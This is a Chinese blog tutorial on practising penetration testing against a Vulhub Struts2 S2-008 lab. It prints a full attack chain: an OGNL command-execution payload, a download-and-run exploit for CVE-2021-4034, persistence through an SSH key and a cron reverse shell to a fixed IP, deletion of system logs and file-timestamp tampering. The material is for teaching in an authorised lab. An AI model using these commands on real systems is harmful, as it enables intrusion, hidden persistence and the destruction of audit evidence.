【从零搭建安全训练场:Vulhub靶场实战通关手册】

原创 已于 2025-08-29 11:37:25 修改 · 334 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #c语言 #汇编 #linux #系统安全 #网络安全 #web安全

于 2025-08-29 11:35:52 首次发布
【从零开始,学习渗透测试,从安全小白,逐步成长为信息安全领域的信息安全专家】
本文章仅提供学习,切勿将其用于不法手段!

想要从零开始学习信息安全技术,需要的是超越常人的毅力与恒心,水滴石穿,十年磨一剑,没有持久的打磨,没有坚定的意志,是难以成为一名优秀的白帽黑客的!这条成长路,注定充满坎坷,而成功,往往是建立在无数次的失败之后!强者,历经风雨,磨难励心,方可登顶“神级”之境!

第一阶段:搭建训练场(30分钟搞定)

  1. 安装准备(就像准备施工场地)
# 安装docker和docker-compose
sudo apt-get install docker.io docker-compose
# 下载vulhub剧本(免费漏洞环境集合)
git clone https://github.com/vulhub/vulhub.git
  1. 启动第一个靶场(像搭积木)
cd vulhub/struts2/s2-008/
docker-compose up -d  # 后台启动容器
# 现在你有了一个带漏洞的Struts2系统

哲理点拨:好的工匠不会在客户家里练手,黑客也不该在真实网站练技术。Vulhub就是我们的数字训练场。

第二阶段:信息收集(侦探式侦察)
就像施工前要看图纸,渗透前要摸清目标:

  1. 端口扫描(查看哪些门开着)
nmap -sS 192.168.1.102  # 发现8080端口开放
  1. 指纹识别(判断系统类型)
whatweb http://192.168.1.102:8080  # 识别出Struts2框架

实战思考:我常告诉徒弟"不要急着拿钻头,先看清墙体是混凝土还是砖砌的"。

第三阶段:漏洞挖掘与利用(精准打击)

  1. 查找漏洞库(像查施工规范手册)

    • 在ExploitDB搜索Struts2 s2-008
    • 确认存在命令执行漏洞

  2. 发起攻击(精准爆破)

curl http://target:8080/devmode.action --data-urlencode \
'debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(1),#f.set(#_memberAccess,1),#a=@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close()'

哲理点拨:这和用冲击钻打孔一个道理——找准薄弱点,用合适的转速和压力。

第四阶段:提权与权限维持(从临时工到管理员)

  1. 信息收集(在系统内部侦察)
whoami        # 查看当前用户
uname -a      # 查看系统版本
find / -perm -4000 2>/dev/null  # 找SUID程序
  1. 内核提权(像用液压顶撑开空间)
    • 搜索系统版本对应的漏洞
    • 使用CVE-2021-4034提权:
wget https://exp.com/poc.c
gcc poc.c -o exp
chmod +x exp
./exp   # 获得root权限
  1. 权限维持(安装后门)
# 添加SSH密钥
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys
# 或者创建定时任务
crontab -e
*/10 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/443 0>&1'

第五阶段:清理痕迹(安全撤离)
就像施工完要清理现场:

  1. 清除日志
# 清理当前会话日志
echo '' > ~/.bash_history
# 清理系统日志
find /var/log -name "*log*" -exec rm {} \;
  1. 隐藏文件(隐藏后门文件)
# 设置文件隐藏属性
chattr +i /root/.ssh/authorized_keys
# 修改文件时间戳
touch -r /etc/passwd /root/.ssh/authorized_keys

终极心法:

  1. 每次测试前备份靶场环境:docker-compose down && docker-compose up -d
  2. 使用VPN和代理隐藏自己(像戴安全帽)
  3. 所有操作必须在授权环境下进行

思考:"信息安全技术,就如同工地干活一样!既要敢想敢做,又要恪守道德!Vulhub,给了我们一个不错的训练场所!在模拟的攻防环境中,我们可以充分锻炼自身技能,最终成长为一名优秀的白帽黑客!"

提示:这里,并非速成教程,而是给予想入行信息安全领域的安全爱好者们,一个入门的机会。

(本文所述技术仅限授权环境使用,所有操作需遵守《网络安全法》。Vulhub项目地址:https://github.com/vulhub/vulhub

Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 4659
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 2193
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
VulnHub渗透测试实战靶场 - CHILI:1
LYJ20010728的博客
08-20 1520
VulnHub渗透测试实战靶场 - CHILI:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.138 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65
vulnhub入门靶场
m0_58481967的博客
11-27 1761
Dns解析同时还涉及到缓存的问题,比如有的时候把host文件里的映射关系删掉了,但还是可以访问,这就涉及到缓存的问题,缓存是什么不多赘述,比如你把hosts的映射删了,但是浏览器里还有缓存,它看见你访问driftingblues.box,然后找到了之前你访问成功的缓存记录,就直接去访问之前host映射的ip地址从而加速域名解析过程。本地hosts文件是优先级最高的缓存。应该是目录文件,dirsearch目录扫描没有这个文件是因为目录扫描也是根据目录字典进行爆破的,对于目录未收录的文件,也是扫不出来的。
搭建Vulhub靶场 【附图】
热门推荐
君莫hacker的博客
09-08 2万+
目录0x01简单概述0x02安装环境1. kali设置2. 更新软件源中的所有软件列表3. 安装https协议及CA证书0x03安装步骤一、安装Docker1. 下载安装2. 查看Docker是否安装成功3. 查看docker基本信息二、安装vluhub1. 安装pip32. 安装Docker-Compose3. 查看docker-compose版本三、安装vulhub靶场1. 克隆下载2. 随便进入一个靶场环境目录3. 对靶场进行编译4. 运行此靶场5. 查看启动环境6. 通过浏览器访问7. 关闭此靶场
vulhub xxe靶机通关教程
Nai_zui_jiang的博客
08-29 916
解码完成后放下翻发现有用户名和密码,用户名为administhebest,但是密码是被md5加密的。这里报错找不到页面肯能是php版本的问题,我们进入小皮->网站->管理->php版本,更换一个版本。发现还得进行base64解码把base32解码完成之后的复制进行64解码。得到了flag的目录那么我们再次进入到xee目录的界面进行抓包读取。我们打开小皮面板进入自己网站的根目录,创建一个php文件进行访问。把刚刚解码的php代码复制进去,并加上
精选资源
---vulhub_Writeup:vulhub靶场个人writeup,转载引用请注明地址,坑点补充联系作者。
03-03
vulhub_Writeup 主要写一些个人在打vulhub靶场中自己遇到的问题和处理方法。作为分享与个人查询所用。 笔者从2020年11月开始自学网安,水平有限,如有问题,恳请指正。 电子邮件:
kali里面的vulhub靶场搭建
weixin_57240513的博客
08-01 1092
查看一下docker-compose的版本信息,查看一下docker-compose有没有下载成功。例如我的是192.168.189.150:8080访问成功,请开始您的操作。进入vulhub后,使用ls命令列出vulhub下的文件也就是靶场关卡。继续ls列出该靶场关卡下的关卡漏洞编号。也可以直接在vulhub文件夹中右键打开终端。先查看一下docker有没有下载成功。再查看一下docker的运行状态。如下图是我开启后的端口。
kali搭建Vulhub靶场
MateSnake的博客
05-11 3088
kali搭建Vulhub靶场
vulhub靶场搭建(kali)
m0_74402888的博客
04-25 1316
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。Docker是一个开源的容器引擎,它有助于更快地交付应用。方便快捷已经是Docker的最大优势,过去需要用数天乃至数周的任务,在Docker容器的处理下,只需要数秒就能完成。Docker三大核心:由镜像(Image)、容器(Container)、仓库(Repository)
精选资源
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L ... 使用git clone https://github.com/vulhub/vulhub.git下载vulhub-master下载太慢了 我这边包需要下载的都提供了,助力你搭建vulhub靶场
Vulnhub-LazySysAdmin 通关指南
大方子
11-20 2336
背景 一个孤独和懒惰的系统管理员哭泣自己睡觉的故事 Difficulty:中等/初学者 Goal: ​ 1.教初学者一些基本的Linux枚举技巧 ​ 2.让自己更加熟悉Linux的服务配置,然后创造更多靶机给大家去学习 ​ 3.得到root权限&找到flag   信息收集 先试用nmap确定靶机的IP地址 nmap -sP 192.168.100.0/24 确定靶...
【渗透测试】Vulnhub靶机-UnInvited: 1-详细通关教程
xianbang_z的博客
03-09 1161
本次靶机难度不高,但唯一费时就是那两个用户名密码,wordpress的密码还好,但exe程序的密码挺难找的,cewl也找不出来,渗透链为:1.进入80网页,通过源码得到base64,解密得知添加fieldforce域名在/etc/hosts。
《Vulnhub通关手册》—— 04 Five86-1
weixin_53801131的博客
12-30 758
Vulnhub通关手册——04 Five86-1 背景概述: 下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/ 本次靶机IP为100.10.10.133,将该IP地址添加到hosts文件中,映射到域名five86.local 技术要点: opennetadmin漏洞利用 find / -type f -user 用户名查看该用户名可以读取的文件 使用hash-identifier查看加密方式 使用crunch生成字典 使用hashcat工具进行密码破解
prime1--vulnhub靶场通关教程
m0_74402888的博客
04-29 2999
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
vulnhub靶场,DC-8
kukudeshuo的博客
07-16 739
vulnhub靶场,DC-8 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-8(192.168.58.151) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan -l确定目标靶机 确定目标靶机IP为192.168.58.151 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 网站目录结构扫描 发现robots.txt文件,访问rob
VulnHub靶场LupinOne
I夜白
02-01 5233
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
《Vulnhub通关手册》—— 03 Raven-1
weixin_53801131的博客
12-28 3994
背景概述: 下载地址:https://www.vulnhub.com/entry/raven-1,256/ 本次的靶机IP为100.10.10.132,将该IP地址添加到hosts文件内,映射到域名raven.local。 1. 信息收集 1.1 扫描目标主机IP 使用arp-scan -l命令进行局域网内部存活主机的扫描。 └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Vulnhub靶场RED靶场
最新发布
m0_65939400的博客
07-27 994
靶场使用vb虚拟机打开,网络设置如下vm的kali也设置为桥接模式,选择同一个网络启动靶机 使用kali扫描主机我们使用nmap扫描靶机开放的端口信息开放了80和22端口我们首先访问他的网站点击hello blue 自动进行域名跳转我们修改一下配置文件 /etc/hosts 添加一行ip和redrocks.winwindows:将192.168.31.90 redrocks.win添加到文件末尾。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值